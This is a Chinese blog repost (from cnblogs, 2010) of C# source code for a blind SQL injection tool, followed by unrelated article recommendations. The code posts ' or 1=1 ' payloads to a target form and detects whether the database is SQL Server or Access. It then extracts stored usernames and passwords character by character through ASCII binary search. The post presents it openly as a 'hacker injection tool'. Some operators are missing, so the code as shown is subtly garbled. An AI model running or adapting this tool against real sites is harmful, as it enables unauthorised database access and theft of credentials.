利用HttpWebRequest和HttpWebResponse做黑客注射工具

最新推荐文章于 2024-10-17 18:58:27 发布
最新推荐文章于 2024-10-17 18:58:27 发布
阅读量64 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/freedom831215/archive/2010/09/09/1822064.html
版权

利用HttpWebRequest和HttpWebResponse做黑客注射工具。

 

 

using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Web;

namespace WindowsApplication1
{
    class Http
    {
        #region 属性
        private string _TableName;      //----表名
        public string TableName
        {
            get { return _TableName; }
            set { _TableName = value; }
        }
        private string _UidFieldName;   //-----用户字段名
        public string UidFieldName
        {
            get { return _UidFieldName; }
            set { _UidFieldName = value; }
        }
        private string _PwdFieldName;   //-----密码字段名
        public string PwdFieldName
        {
            get { return _PwdFieldName; }
            set { _PwdFieldName = value; }
        }
        private int _UidLength;         //------用户名长度
        public int UidLength
        {
            get { return _UidLength; }
            set { _UidLength = value; }
        }
        private int _PwdLength;         //-------密码长度
        public int PwdLength
        {
            get { return _PwdLength; }
            set { _PwdLength = value; }
        }
        private string _dbType;         //-------数据库类型
        public string DbType
        {
            get { return _dbType; }
            set { _dbType = value; }
        }
        private Uri _HackUrl;           //-------网址
        public Uri HackUrl
        {
            get { return _HackUrl; }
            set { _HackUrl = value; }
        }
        private int _FieldNum;          //-----字段数量
        public int FieldNum
        {
            get { return _FieldNum; }
            set { _FieldNum = value; }
        }
        private string _User;           //-----用户名结果
        public string User
        {
            get { return _User; }
            set { _User = value; }
        }
        private string _Pwd;            //------密码结果
        public string Pwd
        {
            get { return _Pwd; }
            set { _Pwd = value; }
        }

        private const string Uid = "Hacking";
        #endregion

        public delegate void ChangeCallBack(string msg);
        public ChangeCallBack CallBack;

        #region 开始Hacking探测
        public void Hacking()
        {
            //------------------------------------检测是否存在注入------------------------------------------------------
            if (CheckSql())
            {
                CallBack("此地址存在注射漏洞!");
            }
            else
            {
                CallBack("此地址不存在注射漏洞!");
                return;
            }
            //------------------------------------检测数据库类型-----------------------------------------------------
            CheckDataBase();

            //-------------------------------------检测字段长度------------------------------------------------------
            //----检测用户名字段长度
            UidLength = CheckFieldLength("用户名字段", UidFieldName);
            if (UidLength > 0)
            {
                CallBack("【探测结束】-->用户名字段长度:" UidLength);
            }
            else
            {
                CallBack("【探测结束】-->用户名字段长度:" UidLength "--->出现异常,请联系软件作者!");
                return;
            }
            //----检测密码字段长度
            PwdLength = CheckFieldLength("密码字段", PwdFieldName);
            if (UidLength > 0)
            {
                CallBack("【探测结束】-->密码字段长度:" PwdLength);
            }
            else
            {
                CallBack("【探测结束】-->密码字段长度:" PwdLength "--->出现异常,请联系软件作者!");
                return;
            }
            //-------------------------------------开始检测字段值结果-------------------------------------------
            //---------检测用户名字段值
            User = GetFieldValue("用户名字段", UidLength, UidFieldName);
            if (User.Length > 0)
            {
                CallBack("【探测结束】--->用户名字段值结果为:" User);
            }
            else
            {
                CallBack("【探测结束】--->用户名字段值结果为:" User "---->出现异常,请联系软件作者");
            }
            //--------检测密码字段值
            Pwd = GetFieldValue("密码字段", PwdLength, PwdFieldName);
            if (Uid.Length > 0)
            {
                CallBack("【探测结束】--->密码字段值结果为:" Pwd);
            }
            else
            {
                CallBack("【探测结束】--->密码字段字段值结果为:" Pwd "---->出现异常,请联系软件作者");
            }

        }
        #endregion
        #region HttpWebRequest发送接收过程
        public string StartHack(string sql)
        {

            HttpWebRequest HttpReq = (HttpWebRequest)WebRequest.Create(HackUrl);
            HttpReq.Method = "POST";
            HttpReq.Accept = "*/*";
            HttpReq.KeepAlive = true;

            HttpReq.ContentType = "application/x-www-form-urlencoded";
            HttpReq.Headers.Add("Accept-Language", "zh-cn");
            HttpReq.Headers.Add("Accept-Encoding", "gzip, deflate");
            //HttpReq.CookieContainer = SqlCookie;        //--------设置Cookie
            //HttpReq.Headers.Add("Cache-Control", "no-cache");
            HttpReq.UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)";


            Encoding Encode = Encoding.GetEncoding("GB2312");
            byte[] SendByte = Encode.GetBytes(sql);
            HttpReq.ContentLength = SendByte.Length;
            //-----Post提交需要一个流对象,Get则不用
            try
            {
                using (Stream reqStream = HttpReq.GetRequestStream())
                {

                    reqStream.Write(SendByte, 0, SendByte.Length);
                }
            }
            catch
            {
                return "";
            }
            try
            {
                using (HttpWebResponse HttpRes = (HttpWebResponse)HttpReq.GetResponse())
                {
                    HttpRes.StatusCode.ToString();
                    Stream GetStream = HttpRes.GetResponseStream();
                    string GetStr = "";
                    StreamReader ReadStream = new StreamReader(GetStream, Encode);
                    GetStr = ReadStream.ReadToEnd();
                    return GetStr;
                }
            }
            catch(Exception ex)
            {
               
                return "";
            }
        }
        #endregion
        #region 设置Cookies值
        protected CookieContainer SetCookie()
        {//---------设置Cookie
            CookieContainer HackSql = new CookieContainer();
            Cookie HackCookie = new Cookie("txtUser", "admin' or 1=1 And ''='");
            HackCookie.Domain = "http://localhost/modipass.asp";
            HackSql.Add(HackCookie);
            return HackSql;
           
        }
        #endregion
        #region 把注射语句Url编码掉
        protected string SetSqlStr(string str)
        {
            StringBuilder sb = new StringBuilder();
            sb.Append("txtNewPass=Hack&txtConfigPass=Hack&txtPass=OldHack&");
            sb.Append("txtUser=" Uid "' ");
            sb.Append(HttpUtility.UrlEncode(str));
            sb.Append(HttpUtility.UrlEncode(" And ''='"));
            return sb.ToString();
        }
        #endregion
        #region 检测是否存在注射漏洞
        public bool CheckSql()
        {//-----------检测是否存在注入
            bool IsSucc = false;
            string sql = " Or 1=1 ";
            sql = SetSqlStr(sql);
            string First = StartHack(sql);
            sql = " Or 1=2 ";
            sql = SetSqlStr(sql);

            string Second = StartHack(sql);
            if (!First.Equals(Second))
            {
                IsSucc = true;
            }
            return IsSucc;


        }
        #endregion
        #region 判断数据库类型
        protected void CheckDataBase()
        {//-------------判断数据库类型
            string RightMsg = StartHack(SetSqlStr("Or 1=1 "));
            string sql = " Or (select count(*) from sysobjects)>0 ";
            sql = SetSqlStr(sql);
            string First = StartHack(sql);
            if(First.Equals(RightMsg))
            {
                DbType = "SQL";
                CallBack("恭喜,此数据库是SQL Server的数据库!");
            }
            else
            {
                DbType = "Access";
                CallBack("数据库类型为:Access");
            }


        }
        #endregion
        #region 检测字段长度
        protected int CheckFieldLength(string msg,string FieldName)
        {//----------------检测字段长度

            CallBack("开始探测" msg "字段长度。。。。。");


            string ErrorMsg = StartHack(SetSqlStr("Or 1=1 "));
            bool IsSucc = false;
            int i = 0;

            string SuccMsg = "";
            while (!IsSucc)
            {
                i ;
                SuccMsg = StartHack(SetSqlStr("or (select top 1 len(" FieldName ") From " TableName ")>" i.ToString()));
                if (!SuccMsg.Equals(ErrorMsg))
                {
                    break;
                }
            }
            return i;
        }
        #endregion
        #region 开始探测字段结果
        protected string GetFieldValue(string msg,int fieldlength,string fieldname)
        {
            CallBack("开始探测" msg "字段值。。。。。");

            string ErrorMsg = StartHack(SetSqlStr("Or 1=2 "));      //--------猜测错误的提示
            bool IsSucc = false;    //----检测是否成功

            StringBuilder sb = new StringBuilder();


            string SuccMsg = "";        //----------猜测正确的提示
            for (int y = 1; y <= fieldlength; y )
            {
                int i = 128 / 2;        //---Ascii码除以2,对半猜,提高效力
                int StartI = 0;   //---用来记录上次猜解的数字
                IsSucc = false;
                while (!IsSucc)
                {
                    //----------首先判断是不是刚好等于这个值
                    #region 判断数据库类型,SQL语句不一样
                    if (DbType == "Access")
                    {
                        SuccMsg = StartHack(SetSqlStr("or (select top 1 asc(mid(" fieldname "," y ",1)) from " TableName ")=" i));
                    }
                    else
                    {
                        SuccMsg = StartHack(SetSqlStr("or (select top 1 ASCII(substring(" fieldname "," y ",1)) from " TableName ")=" i));
                    }
                    #endregion
                    if (!SuccMsg.Equals(ErrorMsg))
                    {
                        sb.Append((char)i);
                        break;
                    }
                    #region 判断数据库类型,SQL语句不一样
                    if (DbType == "Access")
                    {
                        SuccMsg = StartHack(SetSqlStr("or (select top 1 asc(mid(" fieldname "," y ",1)) from " TableName ")>" i));
                    }
                    else
                    {
                        SuccMsg = StartHack(SetSqlStr("or (select top 1 ASCII(substring(" fieldname "," y ",1)) from " TableName ")>" i));
                    }
                    #endregion

                    if (!SuccMsg.Equals(ErrorMsg))
                    {//-------------如果不等于ErrorMsg错误信息,则证明此次注射是对的
                        int temp = i;
                        int temp1 = ((i - StartI) < 0) ? -(i - StartI) : i - StartI;
                        i = (i (temp1 / 2));
                        StartI = temp;
                    }
                    else
                    {//-------------如果等于ErrorMsg错误信息,则证明此次注射是错的
                        int temp = i;
                        int temp1 = ((i - StartI) < 0) ? -(i - StartI) : i - StartI;
                        i = (i - (temp1 / 2));
                        StartI = temp;
                    }
                }
                CallBack("探测" msg "结果:" sb.ToString());
            }
            return sb.ToString();

        }
        #endregion
    }


}

转载于:https://www.cnblogs.com/freedom831215/archive/2010/09/09/1822064.html

weixin_30429201
关注
Fiddler的使用requestreponse请求和响应
wangyudan1018的博客
09-03 516
界面讲解 Fiddler是一款HTTP协议调试代理工具,它能够抓取记录本机所有HTTP(S)请求.其运行机制其实就是本机 127.0.0.1上监听8888端口的HTTP代理 Fiddler无论对开发或者测试人员来说都是很重要的工具 方式1:在官网上下载:http://www.telerik.com/fiddler 方式2:使用下载的安装包进行安装(C:\Users\jack\Desktop\大纲资料\课件\小实训\fiddler的使用) 工具栏区,请求列表区,响应列表区,命令行区
浅谈C#中HttpWebRequestHttpWebResponse的使用方法
08-31
在C#编程中,HttpWebRequestHttpWebResponse是.NET Framework提供的一对类,用于处理HTTP请求和响应。这两个类是System.Net命名空间的一部分,允许开发者发送HTTP请求并接收服务器的响应,进行网页抓取、数据交互...
Fiddler抓包4-工具介绍(requestresponse
weixin_33887443的博客
04-18 287
前言 本篇简单的介绍下fiddler界面的几块区域,以及各自区域到底是干什么用的,以便于各好的掌握这个工具 一、工具简介 1.第一块区域是设置菜单,这个前面2篇都有介绍 2.第二块区域是一些快捷菜单,可以点下快捷功能键 3.第三块左边是抓捕的请求会话列表,每一个请求就是一个会话 4.第四块右边上方区域是request请求的详细信息,可以查看heade...
SpringMVC源码剖析之自动注入RequestResponse
qq_35219329的博客
05-16 1670
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 我们在使用SpringMvc处理请求的时候,可以在controller层或者service层注入HttpServletRequest对象,controller是一个单例对象,在容器初始化的过程中会对其进行属性注入,然而httprequest是随着每次请求的变化而变化的,所以基本不可能在初始化的时候得....
fiddler 抓包详细教程
热门推荐
qq_27009517的博客
09-17 1万+
目录 为什么要先学fiddler? 抓firefox上https请求 一、网页不安全 二、fiddler设置 三、导出证书 四、导入到firefox浏览器 1.打开右上角浏览器设置》选项》高级》证书》查看证书》证书机构》导入 2.勾选文件导入 3.打开文件后,会弹出个框,勾选三个选项就完成操作啦。 证书导出失败问题 前言 一、证书无法导出 1.在点Actions时候出现Export Failed:The root certificate could not be located.
利用HttpWebRequestHttpWebResponse获取Cookie并实现模拟登录
linjcai的博客
08-06 2944
之前看过某个同学的一篇有关与使用JSoup解析学校图书馆的文章,仔细一看,发现竟然是同校!!既然对方用的是java,那么我也就来个C#好了,虽然我的入门语言是java。 C#没有J
HttpWebRequestHttpWebResponse
qq_28570965的博客
03-08 425
本文主要是介绍如何用HttpWebRequest请求带参数的服务,请求服务为某翻译API 直接上源码 1.添加using System.Net;的引用 using System.Net; 2.HttpWebRequestHttpWebResponse public static void Fanyi_HttpWebRequest(string fromString) { Console.WriteLine($"Fanyi post"); string randnum = Random.S
C# 使用HttpWebRequestHttpWebResponse进行设置和获取Cookie
YoseZang的博客
01-09 5557
使用HttpWebRequestHttpWebResponse进行设置和获取Cookie HttpWebRequest的使用方法 例: Uri uri; uri = new Uri("www.baidu.com"); HttpWebRequest webRqst = (HttpWebRequest)WebRequest.Create(url); webRqst.Method = "GET";
HttpWebRequestHttpWebResponse类的认识
诺言在心的博客
02-01 1119
1、HttpWebRequest和类 HttpWebRequestHttpWebResponse类是用于发送和接收HTTP数据的最好选择。它们支持一系列有用的属性。这两个类位 于System.Net命名空间,默认情况下这个类对于控制台程序来说是可访问的。请注意,HttpWebRequest对象不是利用new关键字通过构 造函数来创建的,而是利用工厂机制
C#中的HttpWebRequestHttpWebResponse
weixin_43942765的博客
11-08 521
小编最近遇到了一个调用车辆违章的数据,也就是要调用其他相关机构Api接口,由于小编之前未接触过此类的编码,这个活可真是苦了小编,但小编想啊,如果可以把这个搞定,小编的技术就能再次进阶了,于是小编就开始疯狂的尝试,看了调用Api的接口也使用了,但是最后以屡屡失败告终,小编后来还联系了Api官网的技术服务人员,最后竟也没有搞定,于是乎看了一下师傅的逻辑,咦~~,你猜怎么着,灵感biu的一下就触不及防的...
HttpWebRequestHttpWebResponse 的应用
zhengxiuchen86的博客
01-08 298
本文转载自:http://www.cnblogs.com/yiki/archive/2007/08/28/872528.html 作者:yiki 转载请注明该声明。 HttpWebRequestrequest = (HttpWebRequest)WebRequest.Create(addr); // DownloadstheXMLfilefromthesp...
HttpWebRequestHttpWebResponse用法小结
10-28
HttpWebRequestHttpWebResponse是.NET ...总的来说,HttpWebRequestHttpWebResponse是.NET开发中处理HTTP通信的基础工具,它们提供了丰富的功能,使得我们可以方便地构建和处理HTTP请求,实现与Web服务的交互。
C#使用HttpWebRequestHttpWebResponse模拟用户登录
08-30
本篇文章将详细讲解如何使用`HttpWebRequest`和`HttpWebResponse`这两个类来模拟登录艺龙旅游网。首先,我们需要理解模拟登录的基本流程: 1. **数据收集**:使用浏览器的开发者工具(如Chrome的F12或Firefox的...
MySQL数据库的详细学习步骤
2401_87352036的博客
10-11 1247
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
plsql查询Oracle数据库发现有的数据是乱码
qq_29270805的博客
10-17 252
客户端发送数据:数据 “一二三四五六” 以AL32UTF8字符集编码,即。数据传输:数据通过网络传输到数据库服务器。数据接收与转换:数据库接收到数据后,将其从AL32UTF8转换为ZHS16GBK,即。存储数据:转换后的数据以ZHS16GBK字符集存储在数据库中。
docker-harbor
qq_54598007的博客
10-17 434
(1)基于角色控制:用户和仓库都是基于项目进行组织的,而用户在项目中可以拥有不同的权限。(2)基于镜像的复制策略:镜像可以在多个Harbor实例之间进行复制(同步)。(3)支持 LDAP/AD:Harbor 可以集成企业内部已有的 AD/LDAP(类似数据库的一张表),用于对已经存在的用户认证和管理。(4)镜像删除和垃圾回收:镜像可以被删除,也可以回收镜像占用的空间。(5)图形化用户界面:用户可以通过浏览器来浏览,搜索镜像仓库以及对项目进行管理。
基于SSM班级事务管理系统的设计
2401_87849773的博客
10-15 348
管理员账户功能包括:系统首页,个人中心,学生管理,班委管理,班会组织管理,健康档案管理,党员发展管理,党员培训管理,学生成绩管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。班委账号功能包括:系统首页,学生管理,学生成绩管理,活动信息管理,班费通知管理。服务器:SpringBoot自带 apache tomcat。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发系统:Windows。
MySQL查询优化:提升数据库性能
最新发布
apple_64847327的博客
10-17 536
MySQL查询优化是一个涉及多个层面的复杂过程,需要我们从索引设计、查询语句编写、数据类型选择、服务器配置等多个角度进行综合考虑。通过不断学习和实践,我们可以逐渐掌握这门艺术,从而提升我们的数据库性能,为用户提供更快更好的服务。优化是一个持续的过程,随着数据量的增长和查询模式的变化,我们需要不断地回顾和调整我们的优化策略。
如何使用ssm实现宠物论坛设计网站
寒夜
10-12 983
【代码】ssm宠物论坛设计网站
C# 中HttpWebRequestHttpWebResponse的使用方法详解
* 数据上传:使用HttpWebRequestHttpWebResponse可以上传文件到服务器。 四、结论 HttpWebRequestHttpWebResponse是C#中两个非常重要的类,分别用于发送HTTP请求和接收HTTP响应。通过本篇文章,我们了解了这两...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值